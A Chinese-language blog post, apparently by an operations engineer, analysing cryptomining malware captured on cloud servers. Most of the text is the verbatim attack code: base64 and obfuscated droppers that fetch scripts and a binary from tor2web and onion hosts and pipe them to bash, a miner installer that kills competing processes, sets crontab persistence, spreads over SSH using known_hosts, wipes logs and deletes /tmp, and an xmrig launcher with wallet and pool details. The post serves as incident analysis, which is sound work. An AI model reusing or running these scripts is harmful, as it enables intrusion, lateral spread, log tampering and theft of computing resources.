最近,托管云平台出现大量的挖矿病毒;没有安全意识的小伙伴们就只能乖乖交智商睡了;
抓了好几次,终于反过来抓到入侵脚本;在此做下简单的分析,希望能给大伙一些小小的灵感;
##一个朴实无华的脚本,base64 编码,一脸懵逼;要不是从 /proc/PID 找到线索,还真得被毒打一顿;
#!/bin/bash exec &>/dev/null sleep $((RANDOM % 600)) {echo,ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KKHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby50b3Iyd2ViLmlvL2Nyb24uc2ggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuaW8vY3Jvbi5zaCB8fCB3Z2V0IC10MSAtVDE4MCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlIHJhcGlkN2NwZnFud3hvZG8uZDJ3ZWIub3JnL2Nyb24uc2ggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSByYXBpZDdjcGZxbnd4b2RvLmQyd2ViLm9yZy9jcm9uLnNoIHx8IHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi5tbi9jcm9uLnNoIHx8IGN1cmwgLW0xODAgLWZzU0xrQS0gcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi5tbi9jcm9uLnNoIHx8IHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi50by9jcm9uLnNoIHx8IGN1cmwgLW0xODAgLWZzU0xrQS0gcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi50by9jcm9uLnNoIHx8IHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi5pbi5uZXQvY3Jvbi5zaCB8fCBjdXJsIC1tMTgwIC1mc1NMa0EtIHJhcGlkN2NwZnFud3hvZG8ub25pb24uaW4ubmV0L2Nyb24uc2gpfGJhc2gK}|{base64,-d}|bash
##解密base64 发现;哟哟哟,这脚本很有想法;
(到此处,跟运维同事起了争议;一个认为写域名请求的是傻逼,一个host域名绑定解析就GG了,写死IP才读;另一个认为,写死IP,防火墙直接过滤IP,马上GG ---- 薛定谔之运维工程师)
exec &>/dev/null export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin (wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh || curl -m180 -fsSLkA- rapid7cpfqnwxodo.tor2web.io/cron.sh || wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.d2web.org/cron.sh || curl -m180 -fsSLkA- rapid7cpfqnwxodo.d2web.org/cron.sh || wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.onion.mn/cron.sh || curl -m180 -fsSLkA- rapid7cpfqnwxodo.onion.mn/cron.sh || wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.onion.to/cron.sh || curl -m180 -fsSLkA- rapid7cpfqnwxodo.onion.to/cron.sh || wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.onion.in.net/cron.sh || curl -m180 -fsSLkA- rapid7cpfqnwxodo.onion.in.net/cron.sh)|bash
##继续顺藤摸瓜,请求 rapid7cpfqnwxodo.tor2web.io/cron.sh 网址,拿到下一步操作脚本;又是顿虎虎的加密;
[root@hdp-data tmp]# wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh ${*,,}${*^}$BASH${*//m=qNfV1}${!*} <<< "$("${@//G1-s}"''\p${*/MWRqC/$J%f}r'i'$'\156\u0074f' "ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCngoKSB7Cng9L3N5c3RlbWQtbG9naW4Kej0uLyQoY2F0IC9kZXYvdXJhbmRvbSB8IHRyIC1jZCBbOmFsbnVtOl18aGVhZCAtYyA2KQp3Z2V0IC10MSAtVDE4MCAtcVUtIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgJDEkeCAtTyR6IHx8IGN1cmwgLW0xODAgLWZzU0xrQS0gJDEkeCAtbyR6CmNobW9kICt4ICR6OyR6O3JtIC1mICR6Cn0KY2QgL3RtcAp0b3VjaCAvZGV2L3NobS9hc2RmICYmIGNkIC9kZXYvc2htLwp0b3VjaCAvdmFyL3RtcC9hc2RmICYmIGNkIC92YXIvdG1wLwp0b3VjaCAvdXNyL2Jpbi9hc2RmICYmIGNkIC91c3IvYmluLwp0b3VjaCAvZGF0YS9jb25zdWwvYXNkZiAmJiBjZCAvZGF0YS9jb25zdWwvCnRvdWNoIC9vcHQvY29uc3VsLWRhdGEvYXNkZiAmJiBjZCAvb3B0L2NvbnN1bC1kYXRhLwpybSAtZiAvKi8qL2FzZGYKZm9yIGggaW4gYXB0Z2V0Z3hxczNzZWNkYS50b3Iyd2ViLmlvIGFwdGdldGd4cXMzc2VjZGEub25pb24udG8gYXB0Z2V0Z3hxczNzZWNkYS5kMndlYi5vcmcgYXB0Z2V0Z3hxczNzZWNkYS5vbmlvbi5pbi5uZXQgYXB0Z2V0Z3hxczNzZWNkYS50b3Iyd2ViLnN1CmRvCmlmICEgcHMgLXAgJChjYXQgL3RtcC8uWDFNLXVuaXgpOyB0aGVuCnggJGgKZWxzZQpicmVhawpmaQpkb25lCg=="${@##*eL6%W#K}"${@%%KPM5Ry}"|${*/&0%@N/b>\{&S}b"a"${*/Tu#P\[Z/$ufX\)}se$[((${@%6wk^+}-4"#"20+19#b)+2#11)]4 -d"${@//C#Fr\[A-J}"${*})"${*//K>#,w\"7L/kXKsVG}${*#b0l<}
##继续解密操作,渐渐的好像发现的入侵代码了;只能说,这代码写得跟鬼一样,不懂shell 还真被忽悠住了,咱继续;
exec &>/dev/null export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin x() { x=/systemd-login z=./$(cat /dev/urandom | tr -cd [:alnum:]|head -c 6) wget -t1 -T180 -qU- --no-check-certificate $1$x -O$z || curl -m180 -fsSLkA- $1$x -o$z chmod +x $z;$z;rm -f $z } cd /tmp touch /dev/shm/asdf && cd /dev/shm/ touch /var/tmp/asdf && cd /var/tmp/ touch /usr/bin/asdf && cd /usr/bin/ touch /data/consul/asdf && cd /data/consul/ touch /opt/consul-data/asdf && cd /opt/consul-data/ rm -f /*/*/asdf for h in aptgetgxqs3secda.tor2web.io aptgetgxqs3secda.onion.to aptgetgxqs3secda.d2web.org aptgetgxqs3secda.onion.in.net aptgetgxqs3secda.tor2web.su do if ! ps -p $(cat /tmp/.X1M-unix); then x $h else break fi done
## 一顿for 循环的实际目的,拿到个hhww123 的一个二进制执行文件;
##wget命令拿不到就用curl 命令wget -t1 -T180 -qU- --no-check-certificate aptgetgxqs3secda.tor2web.io/systemd-login -O hhww123 ||curl -m180 -fsSLkA- aptgetgxqs3secda.tor2web.io/systemd-login -O hhww123##最后一个操作:授可执行权限;执行;删除掉执行文件; chmod +x hhww123; hhww123;rm -f hhww123
##至此完美的种下了挖矿病毒;
大伙看到这里,会发现,原来入侵如此简单;可能由于网络安全法等原因,这入侵除了不可反编译看源码的hhww123 二进制文件以外;并没有其他恶意的操作;
接下来给大伙看下些恶意满满的入侵代码;
演示案例①
##这是我第一次看到这么有礼貌的入侵,绅士得让我心中不断MMP;要不是看到一堆rm -rf 和 kill -9 的恶意操作,我差点就信了;
#!/bin/sh #Goal: # The goal of this campaign is as follows; # - To keep the internet safe. # - To keep them hackers from causing real damage to organizations. # - We know you feel We are a potential threat, well We ain't. # - We want to show how tiny vulns could lead to total disasters. # - We know you feel We are Hypocrite's, because we mine. Well if we don't how the hell we gonna let you know we are in. # - Please We plead to every one out there don't sabotage this campaign (We want to keep the internet safe). # - Sometimes you gotta break the rules to make them. # #Disclaimer: #1) We only Wanna Mine. #2) We don't want your data, or anything or even a ransom. #3) Please if you find this code, don't post about it. #4) We make your security better by breaking it. # #Contact: #1) If your server gets infected: # - We will provide cleanup script. # - We will share source of entry into your servers and patch (surely). # - Please if you contacting, please send your affected server's ip and services your run on the server. # - lets talk via email at: internetrapist@rape.lol #2) If you want to partner with us ?. # - Shoot us an email ;). URL=http://p.6465737472756374696f6e.icu:8080/p INSTALL_DIR=/var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/vje9c1vlq/bk20vm2o/pavmofp3 MINER_PID_FILE="$INSTALL_DIR/mpid" GUARD_FILE="$INSTALL_DIR/spid" PROC_HANDLER_PID_FILE="$INSTALL_DIR/ppid" MD5_PROC=2b51d09d8eafb765606ced3b43453c9b MD5_MINER=ae0f778496c2f1056da3437c7dd2e853 MINER_NAME=bioset PROC_HANDLER_NAME=proc_1 check_arg=$1 bot_kill() { ps aux | grep -i "systemd-0" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "vmstat1" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "vmstat0" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "jenkins-0" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "rpciod0" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "kjournald" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "flush-199" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "kblockd0" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "hwlh3wlh44lh" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "Circle_MI" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "get.bi-chi.com" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "hashvault.pro" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "nanopool.org" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "bioset-199" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "kauditd0" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "/usr/bin/.sshd" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "/usr/bin/bsd-port" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "xmr" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "xig" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "ddgs" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "watchdog_0" | awk '{print $2}' | xargs kill -9 ps aux | grep -e '0-9a-f\{32\}' | awk '{print $2}' | xargs kill -9 ps aux | grep -e '0-9a-f\{33\}' | awk '{print $2}' | xargs kill -9 ps aux | grep -i "tmp00" | awk '{print $2}' | xargs kill -9 ps aux | grep -e '0-9a-f\{16\}' | awk '{print $2}' | xargs kill -9 ps aux | grep -i "khugepaged" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "qW3xT" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "wnTKYg" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "t00ls.ru" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "sustes" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "thisxxs" | awk '{print $2}' | xargs kill -9 netstat -antp | grep ":14444" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9 netstat -antp | grep ":3333" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9 netstat -antp | grep ":4444" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9 netstat -antp | grep ":5555" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9 netstat -antp | grep ":7777" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9 ps aux | grep -i "hashfish" | awk '{print $2}' | xargs kill -9 ps aux | grep -i -w "./kworker" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "kworkerds" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "/tmp/devtool" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "systemctI" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "sustse" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "axgt" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "sustse" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "6Tx3Wq" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "dblaunchs" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "migrations" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "kerberods" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "httpdz" | awk '{print $2}' | xargs kill -9 ps aux | grep -i "qgcd" | awk '{print $2}' | xargs kill -9 kill -9 "$(cat /tmp/.X11unix)" kill -9 "$(cat /tmp/.XImunix)" kill -9 "$(cat /tmp/.lsdpid)" # pkill -f "/bin/bash" # ps aux|grep -v grep|grep -v "/bin/sh"|grep -v "bash"|awk '{if($3>=50.0) print $2}'|xargs kill -9 } bash_fake_name() { nohup bash -c "( exec -a '/bin/bash' /bin/bash ) < $1" >/dev/null 2>&1 & sleep 1s pkill -f "$PROC_HANDLER_NAME" sleep 3s } exe_fake_name() { nohup bash -c "exec -a '/sbin/init' $1" >/dev/null 2>&1 & echo $! > $MINER_PID_FILE } run_procs() { if [ -w "$INSTALL_DIR" ]; then chmod +x $INSTALL_DIR/$MINER_NAME chmod +x $INSTALL_DIR/$PROC_HANDLER_NAME if ! kill -0 "$(cat $MINER_PID_FILE)" > /dev/null then exe_fake_name "./$MINER_NAME" fi if ! kill -0 "$(cat $PROC_HANDLER_PID_FILE)" > /dev/null then if test "$check_arg" != "t" then bash_fake_name "./$PROC_HANDLER_NAME" fi fi else exit 1 fi } getmd5() { echo "$(md5sum "$1" | cut -d ' ' -f 1)" } install() { cd $INSTALL_DIR if test "$(getmd5 $MINER_NAME)" != "$MD5_MINER" || test "$(getmd5 $PROC_HANDLER_NAME)" != "$MD5_PROC" then kill -9 "$(cat $PROC_HANDLER_PID_FILE)" kill -9 "$(cat $MINER_PID_FILE)" rm -rf /var/tmp rm -rf /tmp mkdir -p /tmp mkdir -p /var/tmp chmod 1777 /var/tmp chmod 1777 /tmp mkdir -p $INSTALL_DIR cd $INSTALL_DIR sleep 15s mkdir -p $INSTALL_DIR cd $INSTALL_DIR ARCH=$(getconf LONG_BIT) if test "$(getmd5 $PROC_HANDLER_NAME)" != "$MD5_PROC" then (curl -fsSL -m180 "$URL?a=h" -o "$PROC_HANDLER_NAME"||wget -T180 -q "$URL?a=h" -O "$PROC_HANDLER_NAME") fi if test "$(getmd5 $MINER_NAME)" != "$MD5_MINER" then if test "${ARCH}x" = "64x" then (curl -fsSL -m180 "$URL?a=d&ar=64" -o "$MINER_NAME"||wget -T180 -q "$URL?a=d&ar=64" -O "$MINER_NAME") else (curl -fsSL -m180 "$URL?a=d&ar=86" -o "$MINER_NAME"||wget -T180 -q "$URL?a=d&ar=86" -O "$MINER_NAME") fi fi fi run_procs } write_cron() { crontab -r echo "*/10 * * * * (curl -fsSL -m180 \"$URL?a=p&a2=cron\"||wget -q -T180 -O- \"$URL?a=p&a2=cron\")|sh"|crontab - } poll() { (curl -fsSL -m180 "$URL?a=p"||wget -q -T180 -O- "$URL?a=p")|sh } lateral() { for h in $(cat /root/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.bash_history /home/*/.bash_history|grep -v "127.0.0.1"|grep -oE "\b(0-9{1,3}\.){3}0-9{1,3}\b"|sort|uniq); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no "$h" '(curl -fsSL -m180 \"$URL?a=p&a2=lat\"||wget -q -T180 -O- \"$URL?a=p&a2=lat\")|sh >/dev/null 2>&1' & done } log_clear() { echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron sed -i '/6465737472756374696f6e/d' /var/log/syslog } rm -rf /tmp/cron if ! kill -0 "$(cat $GUARD_FILE)" > /dev/null then echo "$$" > $GUARD_FILE bot_kill write_cron log_clear if ! kill -0 "$(cat $MINER_PID_FILE)" > /dev/null || ! kill -0 "$(cat $PROC_HANDLER_PID_FILE)" > /dev/null then install else poll fi lateral log_clear fi exit 0
###一脸懵逼,我从哪里来,我该往哪里去? 没错,反着扒文件,找到了上面那个脚本的前一步shell操作;
#!/bin/sh Check_Repeating_Time=3; # in seconds Max_CPU_Usage='70.0'; #% INSTALL_DIR=/var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/vje9c1vlq/bk20vm2o/pavmofp3 MINER_PID_FILE="$INSTALL_DIR/mpid" PROC_HANDLER_PID_FILE="$INSTALL_DIR/ppid" GUARD_FILE="$INSTALL_DIR/spid" POLL_URL=http://p.6465737472756374696f6e.icu:8080/poll if kill -0 "$(cat $PROC_HANDLER_PID_FILE)" > /dev/null then exit 0 fi MINER_PID=0 while true do echo "$$" > $PROC_HANDLER_PID_FILE if ! kill -0 "$(cat $MINER_PID_FILE)" > /dev/null && ! kill -0 "$MINER_PID" > /dev/null then if ! kill -0 "$(cat $GUARD_FILE)" > /dev/null then (curl -fsSL -m180 "$POLL_URL"||wget -q -T180 -O- "$POLL_URL")|sh -s t fi else if [ -e "$MINER_PID_FILE" ] then MINER_PID="$(cat $MINER_PID_FILE)" fi fi ps aux | awk '{ Proc_Name = $11; CPU_Usage = $3; PID = $2; if((CPU_Usage >= '$Max_CPU_Usage' ) && (PID != '$(cat "$MINER_PID_FILE")') && (PID != '$MINER_PID')) { system ("kill -9 " PID); } }'; sleep $Check_Repeating_Time\s; done;
演示案例②
##这个就厉害了,入侵前应该是做了个root 的密码弱口令暴力猜解;
(注:在此之前,曾找到个.pw 的密码字典;不知道哪位大佬的,有足足二三十万的弱口令枚举;root用户使用密码方式似乎岌岌可危;但如果全部用密钥交换登录形式,对核心堡垒机的考验很大;只要入侵成功,仅仅需要 cat /root/.ssh/known_hosts 拿到主机记录,立马全家一起被端了;)
#!/bin/bash if [[ $(whoami) != "root" ]]; then for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do kill -9 $tr || : ; done; fi threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1); hostHash=$(hostname -f | md5sum | cut -c1-8); echo "${hostHash} - ${threadCount}"; _curl () { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } rm -rf config.json; d () { curl -L --insecure --connect-timeout 5 --max-time 40 --fail $1 -o $2 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 $1 -O $2 2> /dev/null || _curl $1 > $2; } #test ! -s trace && \ # (d http://87.44.19.162/job/Insecure-Jenkins/ws/trace trace || \ # d http://54.88.236.33/job/Insecure-Jenkins/ws/trace trace) test ! -s trace && \ d https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz trace.tgz && \ tar -zxvf trace.tgz && \ mv xmrig-2.14.1/xmrig trace && \ rm -rf xmrig-2.14.1 && \ rm -rf trace.tgz; test ! -x trace && chmod +x trace; k() { ./trace \ --algo cn/double \ -r 100 \ -R 100 \ --keepalive \ --no-color \ --donate-level 1 \ --max-cpu-usage 95 \ --cpu-priority 3 \ --print-time 25 \ --threads ${threadCount:-4} \ --url $1 \ --user XCBzxb7igt5YvbwtYCMPkEWRATpzrMYvU2PpTDi89bon7fYnJgYSeRS8EN5LLnPxgkgfsf3k1DZVn1bzccTFBNhpPGbJGGkskmrSg3EGmoSsQH \ --pass 82b08f53 \ --keepalive } k eu.XCA.cryptopool.space:5555 || k Pool.XCA.CryptoPool.Space:5555
总结分析:
安全只是相对的,没有绝对的安全可言;
对于上述的挖矿病毒来说,未知其入侵源头的话;
只能用治标不治本的办法;禁用相关网络组件或避免不可挽回的操作命令被执行;
例如:wget、curl、rm、kill、echo 等等;